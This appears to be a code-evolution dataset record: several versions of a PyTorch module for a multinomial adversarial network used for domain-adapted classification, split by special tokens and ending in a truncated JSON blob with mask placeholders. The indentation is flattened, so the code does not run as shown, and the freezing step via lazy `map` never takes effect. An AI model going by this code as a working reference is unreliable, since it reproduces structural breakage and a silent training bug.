correct, total = defaultdict(int), defaultdict(int)
d_correct, d_total = 0, 0
num_iter = len(train_loaders[opt.domains[0]])
for i in range(num_iter):
utils.freeze_net(self.F_s)
map(utils.freeze_net, self.F_d.values())
utils.freeze_net(self.C)
utils.unfreeze_net(self.D)
n_critic = opt.n_critic
for _ in range(n_critic):
self.D.zero_grad()
loss_d = {}
for domain in opt.unlabeled_domains:
d_inputs, _ = utils.endless_get_next_batch(
unlabeled_loaders, unlabeled_iters, domain)
d_inputs = d_inputs.to(opt.device)
d_targets = utils.get_domain_label(opt.loss, domain,
len(d_inputs))
shared_feat = self.F_s(d_inputs)
d_outputs = self.D(shared_feat)
_, pred = torch.max(d_outputs, 1)
d_total += len(d_inputs)
if opt.loss.lower() == 'l2':
_, tgt_indices = torch.max(d_targets, 1)
d_correct += (pred == tgt_indices).sum().item()
l_d = functional.mse_loss(d_outputs, d_targets)
l_d.backward()
else:
d_correct += (pred == d_targets).sum().item()
l_d = functional.nll_loss(d_outputs, d_targets)
l_d.backward()
loss_d[domain] = l_d.item()
optimizerD.step()
utils.unfreeze_net(self.F_s)
map(utils.unfreeze_net, self.F_d.values())
utils.unfreeze_net(self.C)
utils.freeze_net(self.D)
self.F_s.zero_grad()
for f_d in self.F_d.values():
f_d.zero_grad()
self.C.zero_grad()
shared_feats, domain_feats = [], []
for domain in opt.domains:
inputs, targets = utils.endless_get_next_batch(
train_loaders, train_iters, domain)
targets = targets.to(opt.device)
inputs = inputs.to(opt.device)
shared_feat = self.F_s(inputs)
shared_feats.append(shared_feat)
domain_feat = self.F_d[domain](inputs)
domain_feats.append(domain_feat)
features = torch.cat((shared_feat, domain_feat), dim=1)
c_outputs = self.C(features)
l_c = functional.nll_loss(c_outputs, targets)
l_c.backward(retain_graph=True)
_, pred = torch.max(c_outputs, 1)
total[domain] += targets.size(0)
correct[domain] += (pred == targets).sum().item()
for domain in opt.unlabeled_domains:
d_inputs, _ = utils.endless_get_next_batch(
unlabeled_loaders, unlabeled_iters, domain)
d_inputs = d_inputs.to(opt.device)
shared_feat = self.F_s(d_inputs)
d_outputs = self.D(shared_feat)
if opt.loss.lower() == 'gr':
d_targets = utils.get_domain_label(opt.loss, domain,
len(d_inputs))
l_d = functional.nll_loss(d_outputs, d_targets)
if opt.lambd > 0:
l_d *= -opt.lambd
elif opt.loss.lower() == 'l2':
d_targets = utils.get_random_domain_label(opt.loss,
len(d_inputs))
l_d = functional.mse_loss(d_outputs, d_targets)
if opt.lambd > 0:
l_d *= opt.lambd
l_d.backward()
optimizer.step()
loss_d_res.append(loss_d['test'])
l_d_res.append(l_d.item())
l_c_res.append(l_c.item())
if (epoch + 1) % kwargs['display_step'] == 0:
print('Epoch:', '%04d, done' % (epoch + 1))
return loss_d_res, l_d_res, l_c_res
<|reserved_special_token_0|>
def get_name(self):
if self._name is None:
self._name = 'MAN({},{},{})'.format(self.k, self.m, 1)
return self._name
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class MultinomialAdversarialNetwork(TopicModel):
def __init__(self, k, m, model_params=None, log_params=None):
super().__init__(k, m, model_params, log_params)
def prepare_data(self, d):
"""
Assume d is a dictionary of dataset where d[domain] = another dataset class
Assume labeled domain = train set, unlabeled = test
"""
train_loaders, train_iters = {}, {}
unlabeled_loaders, unlabeled_iters = {}, {}
for domain in opt.domains:
features, target = torch.from_numpy(d[domain].X.todense().
astype('float32')), torch.from_numpy(d[domain].y)
train = data_utils.TensorDataset(features, target)
train_loaders[domain] = DataLoader(train, opt.batch_size,
shuffle=True)
train_iters[domain] = iter(train_loaders[domain])
for domain in opt.unlabeled_domains:
features, target = torch.from_numpy(d[domain].X.todense().
astype('float32')), torch.from_numpy(d[domain].y)
uset = data_utils.TensorDataset(features, target)
unlabeled_loaders[domain] = DataLoader(uset, opt.batch_size,
shuffle=True)
unlabeled_iters[domain] = iter(unlabeled_loaders[domain])
return train_loaders, train_iters, unlabeled_loaders, unlabeled_iters
def fit(self, d, *args, **kwargs):
train_loaders, train_iters, unlabeled_loaders, unlabeled_iters = (self
.prepare_data(d))
self.F_s = MlpFeatureExtractor(d['train'].X.shape[1], opt.
F_hidden_sizes, opt.shared_hidden_size, opt.dropout)
self.F_d = {}
for domain in opt.domains:
self.F_d[domain] = MlpFeatureExtractor(d['train'].X.shape[1],
opt.F_hidden_sizes, opt.domain_hidden_size, opt.dropout)
self.C = SentimentClassifier(opt.C_layers, opt.shared_hidden_size +
opt.domain_hidden_size, opt.shared_hidden_size + opt.
domain_hidden_size, 2, opt.dropout, opt.C_bn)
self.D = DomainClassifier(opt.D_layers, opt.shared_hidden_size, opt
.shared_hidden_size, len(opt.all_domains), opt.loss, opt.
dropout, opt.D_bn)
self.F_s, self.C, self.D = self.F_s.to(opt.device), self.C.to(opt.
device), self.D.to(opt.device)
for f_d in self.F_d.values():
f_d = f_d.to(opt.device)
optimizer = optim.Adam(itertools.chain(*map(list, [self.F_s.
parameters() if self.F_s else [], self.C.parameters()] + [f.
parameters() for f in self.F_d.values()])), lr=0.0001)
optimizerD = optim.Adam(self.D.parameters(), lr=0.0001)
loss_d_res = []
l_d_res = []
l_c_res = []
for epoch in range(opt.max_epoch):
self.F_s.train()
self.C.train()
self.D.train()
for f in self.F_d.values():
f.train()
correct, total = defaultdict(int), defaultdict(int)
d_correct, d_total = 0, 0
num_iter = len(train_loaders[opt.domains[0]])
for i in range(num_iter):
utils.freeze_net(self.F_s)
map(utils.freeze_net, self.F_d.values())
utils.freeze_net(self.C)
utils.unfreeze_net(self.D)
n_critic = opt.n_critic
for _ in range(n_critic):
self.D.zero_grad()
loss_d = {}
for domain in opt.unlabeled_domains:
d_inputs, _ = utils.endless_get_next_batch(
unlabeled_loaders, unlabeled_iters, domain)
d_inputs = d_inputs.to(opt.device)
d_targets = utils.get_domain_label(opt.loss, domain,
len(d_inputs))
shared_feat = self.F_s(d_inputs)
d_outputs = self.D(shared_feat)
_, pred = torch.max(d_outputs, 1)
d_total += len(d_inputs)
if opt.loss.lower() == 'l2':
_, tgt_indices = torch.max(d_targets, 1)
d_correct += (pred == tgt_indices).sum().item()
l_d = functional.mse_loss(d_outputs, d_targets)
l_d.backward()
else:
d_correct += (pred == d_targets).sum().item()
l_d = functional.nll_loss(d_outputs, d_targets)
l_d.backward()
loss_d[domain] = l_d.item()
optimizerD.step()
utils.unfreeze_net(self.F_s)
map(utils.unfreeze_net, self.F_d.values())
utils.unfreeze_net(self.C)
utils.freeze_net(self.D)
self.F_s.zero_grad()
for f_d in self.F_d.values():
f_d.zero_grad()
self.C.zero_grad()
shared_feats, domain_feats = [], []
for domain in opt.domains:
inputs, targets = utils.endless_get_next_batch(
train_loaders, train_iters, domain)
targets = targets.to(opt.device)
inputs = inputs.to(opt.device)
shared_feat = self.F_s(inputs)
shared_feats.append(shared_feat)
domain_feat = self.F_d[domain](inputs)
domain_feats.append(domain_feat)
features = torch.cat((shared_feat, domain_feat), dim=1)
c_outputs = self.C(features)
l_c = functional.nll_loss(c_outputs, targets)
l_c.backward(retain_graph=True)
_, pred = torch.max(c_outputs, 1)
total[domain] += targets.size(0)
correct[domain] += (pred == targets).sum().item()
for domain in opt.unlabeled_domains:
d_inputs, _ = utils.endless_get_next_batch(
unlabeled_loaders, unlabeled_iters, domain)
d_inputs = d_inputs.to(opt.device)
shared_feat = self.F_s(d_inputs)
d_outputs = self.D(shared_feat)
if opt.loss.lower() == 'gr':
d_targets = utils.get_domain_label(opt.loss, domain,
len(d_inputs))
l_d = functional.nll_loss(d_outputs, d_targets)
if opt.lambd > 0:
l_d *= -opt.lambd
elif opt.loss.lower() == 'l2':
d_targets = utils.get_random_domain_label(opt.loss,
len(d_inputs))
l_d = functional.mse_loss(d_outputs, d_targets)
if opt.lambd > 0:
l_d *= opt.lambd
l_d.backward()
optimizer.step()
loss_d_res.append(loss_d['test'])
l_d_res.append(l_d.item())
l_c_res.append(l_c.item())
if (epoch + 1) % kwargs['display_step'] == 0:
print('Epoch:', '%04d, done' % (epoch + 1))
return loss_d_res, l_d_res, l_c_res
def transform(self, d, *args, **kwargs):
F_d = self.F_d[opt.domains[0]]
self.F_s.eval()
F_d.eval()
self.C.eval()
_, _, _, it = self.prepare_data(d)
it = it[opt.unlabeled_domains[0]]
correct = 0
total = 0
confusion = ConfusionMeter(opt.num_labels)
preds = []
for inputs, targets in it:
inputs = inputs.to(opt.device)
targets = targets.to(opt.device)
d_features = F_d(inputs)
features = torch.cat((self.F_s(inputs), d_features), dim=1)
outputs = self.C(features)
_, pred = torch.max(outputs, 1)
confusion.add(pred.data, targets.data)
total += targets.size(0)
correct += (pred == targets).sum().item()
acc = correct / total
return acc, correct
def get_name(self):
if self._name is None:
self._name = 'MAN({},{},{})'.format(self.k, self.m, 1)
return self._name
<|reserved_special_token_1|>
import numpy as np
from ..utils import Dataset
import math
import random
from .interface import TopicModel
from .man_model.models import *
from .man_model import utils
from .man_model.options import opt
import torch.utils.data as data_utils
from tqdm import tqdm
from collections import defaultdict
import itertools
from torchnet.meter import ConfusionMeter
import torch
import torch.nn as nn
import torch.nn.functional as functional
import torch.optim as optim
from torch.utils.data import ConcatDataset, DataLoader
<|reserved_special_token_0|>
def softmax(x):
"""Compute softmax values for each sets of scores in x."""
e_x = np.exp(x - np.max(x, axis=1).reshape(-1, 1))
return e_x / np.sum(e_x, axis=1).reshape(-1, 1)
class MultinomialAdversarialNetwork(TopicModel):
def __init__(self, k, m, model_params=None, log_params=None):
super().__init__(k, m, model_params, log_params)
def prepare_data(self, d):
"""
Assume d is a dictionary of dataset where d[domain] = another dataset class
Assume labeled domain = train set, unlabeled = test
"""
train_loaders, train_iters = {}, {}
unlabeled_loaders, unlabeled_iters = {}, {}
for domain in opt.domains:
features, target = torch.from_numpy(d[domain].X.todense().
astype('float32')), torch.from_numpy(d[domain].y)
train = data_utils.TensorDataset(features, target)
train_loaders[domain] = DataLoader(train, opt.batch_size,
shuffle=True)
train_iters[domain] = iter(train_loaders[domain])
for domain in opt.unlabeled_domains:
features, target = torch.from_numpy(d[domain].X.todense().
astype('float32')), torch.from_numpy(d[domain].y)
uset = data_utils.TensorDataset(features, target)
unlabeled_loaders[domain] = DataLoader(uset, opt.batch_size,
shuffle=True)
unlabeled_iters[domain] = iter(unlabeled_loaders[domain])
return train_loaders, train_iters, unlabeled_loaders, unlabeled_iters
def fit(self, d, *args, **kwargs):
train_loaders, train_iters, unlabeled_loaders, unlabeled_iters = (self
.prepare_data(d))
self.F_s = MlpFeatureExtractor(d['train'].X.shape[1], opt.
F_hidden_sizes, opt.shared_hidden_size, opt.dropout)
self.F_d = {}
for domain in opt.domains:
self.F_d[domain] = MlpFeatureExtractor(d['train'].X.shape[1],
opt.F_hidden_sizes, opt.domain_hidden_size, opt.dropout)
self.C = SentimentClassifier(opt.C_layers, opt.shared_hidden_size +
opt.domain_hidden_size, opt.shared_hidden_size + opt.
domain_hidden_size, 2, opt.dropout, opt.C_bn)
self.D = DomainClassifier(opt.D_layers, opt.shared_hidden_size, opt
.shared_hidden_size, len(opt.all_domains), opt.loss, opt.
dropout, opt.D_bn)
self.F_s, self.C, self.D = self.F_s.to(opt.device), self.C.to(opt.
device), self.D.to(opt.device)
for f_d in self.F_d.values():
f_d = f_d.to(opt.device)
optimizer = optim.Adam(itertools.chain(*map(list, [self.F_s.
parameters() if self.F_s else [], self.C.parameters()] + [f.
parameters() for f in self.F_d.values()])), lr=0.0001)
optimizerD = optim.Adam(self.D.parameters(), lr=0.0001)
loss_d_res = []
l_d_res = []
l_c_res = []
for epoch in range(opt.max_epoch):
self.F_s.train()
self.C.train()
self.D.train()
for f in self.F_d.values():
f.train()
correct, total = defaultdict(int), defaultdict(int)
d_correct, d_total = 0, 0
num_iter = len(train_loaders[opt.domains[0]])
for i in range(num_iter):
utils.freeze_net(self.F_s)
map(utils.freeze_net, self.F_d.values())
utils.freeze_net(self.C)
utils.unfreeze_net(self.D)
n_critic = opt.n_critic
for _ in range(n_critic):
self.D.zero_grad()
loss_d = {}
for domain in opt.unlabeled_domains:
d_inputs, _ = utils.endless_get_next_batch(
unlabeled_loaders, unlabeled_iters, domain)
d_inputs = d_inputs.to(opt.device)
d_targets = utils.get_domain_label(opt.loss, domain,
len(d_inputs))
shared_feat = self.F_s(d_inputs)
d_outputs = self.D(shared_feat)
_, pred = torch.max(d_outputs, 1)
d_total += len(d_inputs)
if opt.loss.lower() == 'l2':
_, tgt_indices = torch.max(d_targets, 1)
d_correct += (pred == tgt_indices).sum().item()
l_d = functional.mse_loss(d_outputs, d_targets)
l_d.backward()
else:
d_correct += (pred == d_targets).sum().item()
l_d = functional.nll_loss(d_outputs, d_targets)
l_d.backward()
loss_d[domain] = l_d.item()
optimizerD.step()
utils.unfreeze_net(self.F_s)
map(utils.unfreeze_net, self.F_d.values())
utils.unfreeze_net(self.C)
utils.freeze_net(self.D)
self.F_s.zero_grad()
for f_d in self.F_d.values():
f_d.zero_grad()
self.C.zero_grad()
shared_feats, domain_feats = [], []
for domain in opt.domains:
inputs, targets = utils.endless_get_next_batch(
train_loaders, train_iters, domain)
targets = targets.to(opt.device)
inputs = inputs.to(opt.device)
shared_feat = self.F_s(inputs)
shared_feats.append(shared_feat)
domain_feat = self.F_d[domain](inputs)
domain_feats.append(domain_feat)
features = torch.cat((shared_feat, domain_feat), dim=1)
c_outputs = self.C(features)
l_c = functional.nll_loss(c_outputs, targets)
l_c.backward(retain_graph=True)
_, pred = torch.max(c_outputs, 1)
total[domain] += targets.size(0)
correct[domain] += (pred == targets).sum().item()
for domain in opt.unlabeled_domains:
d_inputs, _ = utils.endless_get_next_batch(
unlabeled_loaders, unlabeled_iters, domain)
d_inputs = d_inputs.to(opt.device)
shared_feat = self.F_s(d_inputs)
d_outputs = self.D(shared_feat)
if opt.loss.lower() == 'gr':
d_targets = utils.get_domain_label(opt.loss, domain,
len(d_inputs))
l_d = functional.nll_loss(d_outputs, d_targets)
if opt.lambd > 0:
l_d *= -opt.lambd
elif opt.loss.lower() == 'l2':
d_targets = utils.get_random_domain_label(opt.loss,
len(d_inputs))
l_d = functional.mse_loss(d_outputs, d_targets)
if opt.lambd > 0:
l_d *= opt.lambd
l_d.backward()
optimizer.step()
loss_d_res.append(loss_d['test'])
l_d_res.append(l_d.item())
l_c_res.append(l_c.item())
if (epoch + 1) % kwargs['display_step'] == 0:
print('Epoch:', '%04d, done' % (epoch + 1))
return loss_d_res, l_d_res, l_c_res
def transform(self, d, *args, **kwargs):
F_d = self.F_d[opt.domains[0]]
self.F_s.eval()
F_d.eval()
self.C.eval()
_, _, _, it = self.prepare_data(d)
it = it[opt.unlabeled_domains[0]]
correct = 0
total = 0
confusion = ConfusionMeter(opt.num_labels)
preds = []
for inputs, targets in it:
inputs = inputs.to(opt.device)
targets = targets.to(opt.device)
d_features = F_d(inputs)
features = torch.cat((self.F_s(inputs), d_features), dim=1)
outputs = self.C(features)
_, pred = torch.max(outputs, 1)
confusion.add(pred.data, targets.data)
total += targets.size(0)
correct += (pred == targets).sum().item()
acc = correct / total
return acc, correct
def get_name(self):
if self._name is None:
self._name = 'MAN({},{},{})'.format(self.k, self.m, 1)
return self._name
<|reserved_special_token_1|>
#This version assumes domains = train/test set
import numpy as np
from ..utils import Dataset
import math
import random
from .interface import TopicModel
from .man_model.models import *
from .man_model import utils
from .man_model.options import opt
import torch.utils.data as data_utils
from tqdm import tqdm
from collections import defaultdict
import itertools
from torchnet.meter import ConfusionMeter
import torch
import torch.nn as nn
import torch.nn.functional as functional
import torch.optim as optim
from torch.utils.data import ConcatDataset, DataLoader
"""
IMPORTANT: for some reason, Model (self.F_s,etc) will not work if inputs are not float32
=> need to convert. Dont know if same thing for target tho?
Also apparently, domain labels retrieved from get_domain_labels cannot be -1?
Output size for C HAS TO BE 2 even if it's a binary classification
"""
def softmax(x):
"""Compute softmax values for each sets of scores in x."""
e_x = np.exp(x - np.max(x, axis=1).reshape(-1, 1))
return e_x / np.sum(e_x, axis=1).reshape(-1, 1)
class MultinomialAdversarialNetwork(TopicModel):
def __init__(self, k, m, model_params=None, log_params=None):
super().__init__(k,m,model_params,log_params)
def prepare_data(self,d):
"""
Assume d is a dictionary of dataset where d[domain] = another dataset class
Assume labeled domain = train set, unlabeled = test
"""
train_loaders, train_iters = {}, {}
unlabeled_loaders, unlabeled_iters = {}, {}
for domain in opt.domains:
#CONVERT TO FLOAT32
features, target = torch.from_numpy(d[domain].X.todense().astype('float32')), torch.from_numpy(d[domain].y)#.reshape((-1,1))
train = data_utils.TensorDataset(features,target)
train_loaders[domain] = DataLoader(train, opt.batch_size, shuffle = True)
train_iters[domain] = iter(train_loaders[domain])
for domain in opt.unlabeled_domains:
features, target = torch.from_numpy(d[domain].X.todense().astype('float32')), torch.from_numpy(d[domain].y)#.reshape(-1,1))
uset = data_utils.TensorDataset(features,target)
unlabeled_loaders[domain] = DataLoader(uset,opt.batch_size, shuffle = True)
unlabeled_iters[domain] = iter(unlabeled_loaders[domain])
return train_loaders, train_iters, unlabeled_loaders, unlabeled_iters
def fit(self, d, *args, **kwargs):
#minibatches = create_minibatch(X, y, z, batch_size)
#TODO: make this able to fit consecutively
train_loaders, train_iters, unlabeled_loaders, unlabeled_iters = self.prepare_data(d)
#Training
self.F_s = MlpFeatureExtractor(d['train'].X.shape[1], opt.F_hidden_sizes,opt.shared_hidden_size, opt.dropout)
self.F_d = {}
for domain in opt.domains:
self.F_d[domain] = MlpFeatureExtractor(d['train'].X.shape[1], opt.F_hidden_sizes, opt.domain_hidden_size, opt.dropout)
self.C = SentimentClassifier(opt.C_layers, opt.shared_hidden_size + opt.domain_hidden_size, opt.shared_hidden_size + opt.domain_hidden_size, 2,opt.dropout, opt.C_bn)
self.D = DomainClassifier(opt.D_layers, opt.shared_hidden_size, opt.shared_hidden_size,len(opt.all_domains), opt.loss, opt.dropout, opt.D_bn)
# print("try")
# print(opt.device)
self.F_s, self.C, self.D = self.F_s.to(opt.device), self.C.to(opt.device), self.D.to(opt.device)
for f_d in self.F_d.values():
f_d = f_d.to(opt.device)
# print("endtry")
# # optimizers
optimizer = optim.Adam(itertools.chain(*map(list, [self.F_s.parameters() if self.F_s else [], self.C.parameters()] + [f.parameters() for f in self.F_d.values()])), lr=0.0001)
optimizerD = optim.Adam(self.D.parameters(), lr=0.0001)
loss_d_res = []
l_d_res = []
l_c_res = []
for epoch in range(opt.max_epoch):
self.F_s.train()
self.C.train()
self.D.train()
for f in self.F_d.values():
f.train()
# training accuracy
correct, total = defaultdict(int), defaultdict(int)
# D accuracy
d_correct, d_total = 0, 0
# conceptually view 1 epoch as 1 epoch of the first domain
num_iter = len(train_loaders[opt.domains[0]])
for i in range(num_iter):
# D iterations
utils.freeze_net(self.F_s)
map(utils.freeze_net, self.F_d.values())
utils.freeze_net(self.C)
utils.unfreeze_net(self.D)
# optional WGAN n_critic trick
n_critic = opt.n_critic
for _ in range(n_critic):
self.D.zero_grad()
loss_d = {}
# train on both labeled and unlabeled domains
for domain in opt.unlabeled_domains:
# targets not used
d_inputs, _ = utils.endless_get_next_batch(
unlabeled_loaders, unlabeled_iters, domain)
d_inputs = d_inputs.to(opt.device)
d_targets = utils.get_domain_label(opt.loss, domain, len(d_inputs))
shared_feat = self.F_s(d_inputs)
d_outputs = self.D(shared_feat)
# D accuracy
_, pred = torch.max(d_outputs, 1)
d_total += len(d_inputs)
if opt.loss.lower() == 'l2':
_, tgt_indices = torch.max(d_targets, 1)
d_correct += (pred==tgt_indices).sum().item()
l_d = functional.mse_loss(d_outputs, d_targets)
l_d.backward()
else:
d_correct += (pred==d_targets).sum().item()
l_d = functional.nll_loss(d_outputs, d_targets)
l_d.backward()
loss_d[domain] = l_d.item()
optimizerD.step()
# F&C iteration
utils.unfreeze_net(self.F_s)
map(utils.unfreeze_net, self.F_d.values())
utils.unfreeze_net(self.C)
utils.freeze_net(self.D)
#if opt.fix_emb:
# utils.freeze_net(self.F_s.word_emb)
# map(utils.freeze_net, self.F_d.values())
self.F_s.zero_grad()
for f_d in self.F_d.values():
f_d.zero_grad()
self.C.zero_grad()
shared_feats, domain_feats = [], []
for domain in opt.domains:
inputs, targets = utils.endless_get_next_batch(
train_loaders, train_iters, domain)
#target = torch.int64 rn
targets = targets.to(opt.device)
inputs = inputs.to(opt.device)
shared_feat = self.F_s(inputs)
shared_feats.append(shared_feat)
domain_feat = self.F_d[domain](inputs)
domain_feats.append(domain_feat)
features = torch.cat((shared_feat, domain_feat), dim=1)
c_outputs = self.C(features)
#return c_outputs, targets
#DEVICE SIDE TRIGGERED ERROR OCCUR HERE (l_c=...)
l_c = functional.nll_loss(c_outputs, targets)
l_c.backward(retain_graph=True)
# training accuracy
_, pred = torch.max(c_outputs, 1)
total[domain] += targets.size(0)
correct[domain] += (pred == targets).sum().item()
# update F with D gradients on all domains
for domain in opt.unlabeled_domains:
d_inputs, _ = utils.endless_get_next_batch(
unlabeled_loaders, unlabeled_iters, domain)
d_inputs = d_inputs.to(opt.device)
shared_feat = self.F_s(d_inputs)
d_outputs = self.D(shared_feat)
if opt.loss.lower() == 'gr':
d_targets = utils.get_domain_label(opt.loss, domain, len(d_inputs))
l_d = functional.nll_loss(d_outputs, d_targets)
if opt.lambd > 0:
l_d *= -opt.lambd
elif opt.loss.lower() == 'l2':
d_targets = utils.get_random_domain_label(opt.loss, len(d_inputs))
l_d = functional.mse_loss(d_outputs, d_targets)
if opt.lambd > 0:
l_d *= opt.lambd
l_d.backward()
optimizer.step()
# print(loss_d)
# print('l_d loss: {}'.format(l_d.item()))
# print('l_c loss: {}'.format(l_c.item()))
loss_d_res.append(loss_d['test'])
l_d_res.append(l_d.item())
l_c_res.append(l_c.item())
if (epoch + 1) % kwargs["display_step"] == 0:
print(
"Epoch:", "%04d, done" % (epoch + 1) #"cost=", "{:.9f}"#.format(l_d.data[0])
)
return loss_d_res, l_d_res, l_c_res
def transform(self, d, *args, **kwargs):
F_d = self.F_d[opt.domains[0]]
self.F_s.eval()
F_d.eval()
self.C.eval()
_,_,_,it = self.prepare_data(d)
it = it[opt.unlabeled_domains[0]]
correct = 0
total = 0
confusion = ConfusionMeter(opt.num_labels)
preds = []
for inputs,targets in it:
inputs = inputs.to(opt.device)
targets = targets.to(opt.device)
d_features = F_d(inputs)
features = torch.cat((self.F_s(inputs), d_features), dim=1)
outputs = self.C(features)
_, pred = torch.max(outputs, 1)
#preds.extend(pred.data)
confusion.add(pred.data, targets.data)
total += targets.size(0)
correct += (pred == targets).sum().item()
acc = correct / total
#('{}: Accuracy on {} samples: {}%'.format(name, total, 100.0*acc))
return acc, correct
#return preds
def get_name(self):
if self._name is None:
self._name = "MAN({},{},{})".format(self.k,self.m,1)
return self._name
|
flexible
|
{
"blob_id": "8f01934472805b5ad6dca328483a7ac79ae7748a",
"index": 6474,
"step-1": "<mask token>\n\n\nclass MultinomialAdversarialNetwork(TopicModel):\n <mask token>\n\n def prepare_data(self, d):\n \"\"\"\n Assume d is a dictionary of dataset where d[domain] = another dataset class\n Assume labeled domain = train set, unlabeled = test\n \"\"\"\n train_loaders, train_iters = {}, {}\n unlabeled_loaders, unlabeled_iters = {}, {}\n for domain in opt.domains:\n features, target = torch.from_numpy(d[domain].X.todense().\n astype('float32')), torch.from_numpy(d[domain].y)\n train = data_utils.TensorDataset(features, target)\n train_loaders[domain] = DataLoader(train, opt.batch_size,\n shuffle=True)\n train_iters[domain] = iter(train_loaders[domain])\n for domain in opt.unlabeled_domains:\n features, target = torch.from_numpy(d[domain].X.todense().\n astype('float32')), torch.from_numpy(d[domain].y)\n uset = data_utils.TensorDataset(features, target)\n unlabeled_loaders[domain] = DataLoader(uset, opt.batch_size,\n shuffle=True)\n unlabeled_iters[domain] = iter(unlabeled_loaders[domain])\n return train_loaders, train_iters, unlabeled_loaders, unlabeled_iters\n\n def fit(self, d, *args, **kwargs):\n train_loaders, train_iters, unlabeled_loaders, unlabeled_iters = (self\n .prepare_data(d))\n self.F_s = MlpFeatureExtractor(d['train'].X.shape[1], opt.\n F_hidden_sizes, opt.shared_hidden_size, opt.dropout)\n self.F_d = {}\n for domain in opt.domains:\n self.F_d[domain] = MlpFeatureExtractor(d['train'].X.shape[1],\n opt.F_hidden_sizes, opt.domain_hidden_size, opt.dropout)\n self.C = SentimentClassifier(opt.C_layers, opt.shared_hidden_size +\n opt.domain_hidden_size, opt.shared_hidden_size + opt.\n domain_hidden_size, 2, opt.dropout, opt.C_bn)\n self.D = DomainClassifier(opt.D_layers, opt.shared_hidden_size, opt\n .shared_hidden_size, len(opt.all_domains), opt.loss, opt.\n dropout, opt.D_bn)\n self.F_s, self.C, self.D = self.F_s.to(opt.device), self.C.to(opt.\n device), self.D.to(opt.device)\n for f_d in self.F_d.values():\n f_d = f_d.to(opt.device)\n optimizer = optim.Adam(itertools.chain(*map(list, [self.F_s.\n parameters() if self.F_s else [], self.C.parameters()] + [f.\n parameters() for f in self.F_d.values()])), lr=0.0001)\n optimizerD = optim.Adam(self.D.parameters(), lr=0.0001)\n loss_d_res = []\n l_d_res = []\n l_c_res = []\n for epoch in range(opt.max_epoch):\n self.F_s.train()\n self.C.train()\n self.D.train()\n for f in self.F_d.values():\n f.train()\n correct, total = defaultdict(int), defaultdict(int)\n d_correct, d_total = 0, 0\n num_iter = len(train_loaders[opt.domains[0]])\n for i in range(num_iter):\n utils.freeze_net(self.F_s)\n map(utils.freeze_net, self.F_d.values())\n utils.freeze_net(self.C)\n utils.unfreeze_net(self.D)\n n_critic = opt.n_critic\n for _ in range(n_critic):\n self.D.zero_grad()\n loss_d = {}\n for domain in opt.unlabeled_domains:\n d_inputs, _ = utils.endless_get_next_batch(\n unlabeled_loaders, unlabeled_iters, domain)\n d_inputs = d_inputs.to(opt.device)\n d_targets = utils.get_domain_label(opt.loss, domain,\n len(d_inputs))\n shared_feat = self.F_s(d_inputs)\n d_outputs = self.D(shared_feat)\n _, pred = torch.max(d_outputs, 1)\n d_total += len(d_inputs)\n if opt.loss.lower() == 'l2':\n _, tgt_indices = torch.max(d_targets, 1)\n d_correct += (pred == tgt_indices).sum().item()\n l_d = functional.mse_loss(d_outputs, d_targets)\n l_d.backward()\n else:\n d_correct += (pred == d_targets).sum().item()\n l_d = functional.nll_loss(d_outputs, d_targets)\n l_d.backward()\n loss_d[domain] = l_d.item()\n optimizerD.step()\n utils.unfreeze_net(self.F_s)\n map(utils.unfreeze_net, self.F_d.values())\n utils.unfreeze_net(self.C)\n utils.freeze_net(self.D)\n self.F_s.zero_grad()\n for f_d in self.F_d.values():\n f_d.zero_grad()\n self.C.zero_grad()\n shared_feats, domain_feats = [], []\n for domain in opt.domains:\n inputs, targets = utils.endless_get_next_batch(\n train_loaders, train_iters, domain)\n targets = targets.to(opt.device)\n inputs = inputs.to(opt.device)\n shared_feat = self.F_s(inputs)\n shared_feats.append(shared_feat)\n domain_feat = self.F_d[domain](inputs)\n domain_feats.append(domain_feat)\n features = torch.cat((shared_feat, domain_feat), dim=1)\n c_outputs = self.C(features)\n l_c = functional.nll_loss(c_outputs, targets)\n l_c.backward(retain_graph=True)\n _, pred = torch.max(c_outputs, 1)\n total[domain] += targets.size(0)\n correct[domain] += (pred == targets).sum().item()\n for domain in opt.unlabeled_domains:\n d_inputs, _ = utils.endless_get_next_batch(\n unlabeled_loaders, unlabeled_iters, domain)\n d_inputs = d_inputs.to(opt.device)\n shared_feat = self.F_s(d_inputs)\n d_outputs = self.D(shared_feat)\n if opt.loss.lower() == 'gr':\n d_targets = utils.get_domain_label(opt.loss, domain,\n len(d_inputs))\n l_d = functional.nll_loss(d_outputs, d_targets)\n if opt.lambd > 0:\n l_d *= -opt.lambd\n elif opt.loss.lower() == 'l2':\n d_targets = utils.get_random_domain_label(opt.loss,\n len(d_inputs))\n l_d = functional.mse_loss(d_outputs, d_targets)\n if opt.lambd > 0:\n l_d *= opt.lambd\n l_d.backward()\n optimizer.step()\n loss_d_res.append(loss_d['test'])\n l_d_res.append(l_d.item())\n l_c_res.append(l_c.item())\n if (epoch + 1) % kwargs['display_step'] == 0:\n print('Epoch:', '%04d, done' % (epoch + 1))\n return loss_d_res, l_d_res, l_c_res\n <mask token>\n\n def get_name(self):\n if self._name is None:\n self._name = 'MAN({},{},{})'.format(self.k, self.m, 1)\n return self._name\n",
"step-2": "<mask token>\n\n\nclass MultinomialAdversarialNetwork(TopicModel):\n\n def __init__(self, k, m, model_params=None, log_params=None):\n super().__init__(k, m, model_params, log_params)\n\n def prepare_data(self, d):\n \"\"\"\n Assume d is a dictionary of dataset where d[domain] = another dataset class\n Assume labeled domain = train set, unlabeled = test\n \"\"\"\n train_loaders, train_iters = {}, {}\n unlabeled_loaders, unlabeled_iters = {}, {}\n for domain in opt.domains:\n features, target = torch.from_numpy(d[domain].X.todense().\n astype('float32')), torch.from_numpy(d[domain].y)\n train = data_utils.TensorDataset(features, target)\n train_loaders[domain] = DataLoader(train, opt.batch_size,\n shuffle=True)\n train_iters[domain] = iter(train_loaders[domain])\n for domain in opt.unlabeled_domains:\n features, target = torch.from_numpy(d[domain].X.todense().\n astype('float32')), torch.from_numpy(d[domain].y)\n uset = data_utils.TensorDataset(features, target)\n unlabeled_loaders[domain] = DataLoader(uset, opt.batch_size,\n shuffle=True)\n unlabeled_iters[domain] = iter(unlabeled_loaders[domain])\n return train_loaders, train_iters, unlabeled_loaders, unlabeled_iters\n\n def fit(self, d, *args, **kwargs):\n train_loaders, train_iters, unlabeled_loaders, unlabeled_iters = (self\n .prepare_data(d))\n self.F_s = MlpFeatureExtractor(d['train'].X.shape[1], opt.\n F_hidden_sizes, opt.shared_hidden_size, opt.dropout)\n self.F_d = {}\n for domain in opt.domains:\n self.F_d[domain] = 